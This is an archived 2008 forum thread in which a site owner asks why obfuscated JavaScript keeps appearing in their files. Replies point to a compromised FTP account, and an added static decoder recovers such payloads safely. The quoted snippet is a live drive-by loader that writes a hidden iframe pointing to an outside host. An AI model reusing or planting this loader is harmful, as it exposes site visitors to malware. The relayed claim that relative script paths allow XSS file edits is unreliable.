arifsor Posted July 18, 2008

Hi, I have made my site XSS-proof, but the following code is still being embedded in my site:

```
var dtzhtxkdkr="";for(dolnbjhcfei=0;dolnbjhcfei<fuqgkpou.length;dolnbjhcfei+=2){dtzhtxkdkr+=(String.fromCharCode(parseInt(fuqgkpou.substr(dolnbjhcfei,2),16)));}document.write(dtzhtxkdkr);}uavxgizkldzyckm("3C69eiqpxekm66eiqpxekm72eiqpxekm616D652073eiqpxekm72633D226874eiqpxekm74eiqpxekm70eiqpxekm3Aeiqpxekm2F2F746Feiqpxekm703130302D636F756E74eiqpxekm65722E636Feiqpxekm6Deiqpxekm2Feiqpxekm746Feiqpxekm70eiqpxekm3130302F69eiqpxekm6E6465782E70eiqpxekm68eiqpxekm70eiqpxekm22eiqpxekm20eiqpxekm66eiqpxekm72eiqpxekm61eiqpxekm6D65626Feiqpxekm72eiqpxekm64eiqpxekm6572eiqpxekm3D22eiqpxekm30eiqpxekm2220eiqpxekm626F72eiqpxekm646572eiqpxekm3D2230eiqpxekm22eiqpxekm20eiqpxekm7769eiqpxekm64eiqpxekm7468eiqpxekm3Deiqpxekm22eiqpxekm30222068eiqpxekm65eiqpxekm69eiqpxekm67eiqpxekm68eiqpxekm743Deiqpxekm22302220737479eiqpxekm6Ceiqpxekm65eiqpxekm3D22eiqpxekm70eiqpxekm6Feiqpxekm73eiqpxekm6974eiqpxekm69eiqpxekm6F6E3A206162eiqpxekm736F6C757465eiqpxekm3B20eiqpxekm76697369eiqpxekm62eiqpxekm696C69eiqpxekm74793A20eiqpxekm68696464eiqpxekm65eiqpxekm6Eeiqpxekm3B2064eiqpxekm69eiqpxekm73eiqpxekm70eiqpxekm6Ceiqpxekm61793Aeiqpxekm206E6F6E65eiqpxekm22eiqpxekm3Eeiqpxekm3Ceiqpxekm2Feiqpxekm696672eiqpxekm61eiqpxekm6Deiqpxekm65eiqpxekm3Eeiqpxekm".replace(/eiqpxekm/g, ""))
```

Any idea? Is this a hosting server issue? Please help.

awpti Posted July 18, 2008

Included as in.. stuck inside of your actual files or your DB?

Former: Your FTP is compromised (or server if you aren't on shared hosting).

Latter: Your script(s) are vulnerable to SQL Injection attacks.

arifsor Posted July 18, 2008

> Included as in.. stuck inside of your actual files or your DB?
>
> Former: Your FTP is compromised (or server if you aren't on shared hosting).
>
> Latter: Your script(s) are vulnerable to SQL Injection attacks.

This script is inside my actual file.

unkwntech Posted July 18, 2008

I noticed a repeating string in there: eiqpxekm

I did a quick Google search for it and found someone running a forum with the same issue and another site that seems to be compromised... I'm not sure what it is or what, if anything, it does.

arifsor Posted July 18, 2008

Anybody have any idea??

awpti Posted July 18, 2008

Yes. It means your FTP has been compromised. Change your FTP password (and username if possible).

arifsor Posted July 19, 2008

Is it possible that someone can update my file, which has 444 permission, through XSS?

The following is the response from my server guy: including the JS file using relative paths (i.e. some/path/some.js) can be abused for XSS injections.
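
Added example, not part of any post in this thread: a static decoder for the pattern in the snippet from the first post (hex byte pairs interleaved with a filler token that `.replace()` strips), which recovers the markup the script would write without executing it. The sample input, its filler `kqzjx` and the `example.invalid` URL are constructed, and `decodeInjected` is a hypothetical helper name.

```javascript
// Static decoder for the "hex string + filler token" injection pattern.
// It never evaluates the script; it only reverses the string transform.

// Constructed sample in the same shape as the injected snippet (not real data).
const SAMPLE =
  'decoyFn("3C69kqzjx6672616D65kqzjx207372633D22kqzjx687474703A2F2F' +
  'kqzjx6578616D706C65kqzjx2E696E76616C6964kqzjx2F6322kqzjx2077696474683D223022' +
  'kqzjx206865696768743D223022kqzjx3E3C2F696672616D653E".replace(/kqzjx/g, ""))';

// Matches: "<alphanumeric payload>".replace(/<filler>/g, "")
const CALL_RE =
  /"([0-9A-Za-z]+)"\s*\.replace\(\s*\/([A-Za-z0-9]+)\/g\s*,\s*""\s*\)/g;

function decodeInjected(source) {
  const findings = [];
  for (const m of source.matchAll(CALL_RE)) {
    const [, payload, filler] = m;
    // Remove the filler token exactly as the injected .replace() would.
    const hex = payload.split(filler).join("");
    // Keep only candidates that are clean hex byte pairs afterwards.
    if (hex.length === 0 || hex.length % 2 !== 0) continue;
    if (!/^[0-9A-Fa-f]+$/.test(hex)) continue;
    const html = hex
      .match(/../g)
      .map((pair) => String.fromCharCode(parseInt(pair, 16)))
      .join("");
    // Pull out iframe targets so they can be blocked or searched for in logs.
    const srcRe = /<iframe\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi;
    const iframeSrcs = [...html.matchAll(srcRe)].map((x) => x[1]);
    // Zero-size or hidden frames are the usual sign of a drive-by include.
    const hidden =
      /width\s*=\s*["']?0\b|height\s*=\s*["']?0\b|display\s*:\s*none|visibility\s*:\s*hidden/i
        .test(html);
    findings.push({ filler, html, iframeSrcs, hidden });
  }
  return findings;
}

console.log(JSON.stringify(decodeInjected(SAMPLE), null, 2));
```

Running it over every file in the web root shows which files were modified and where the hidden frame points, which helps when cleaning up after the FTP password change.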
Archived
This topic is now archived and is closed to further replies.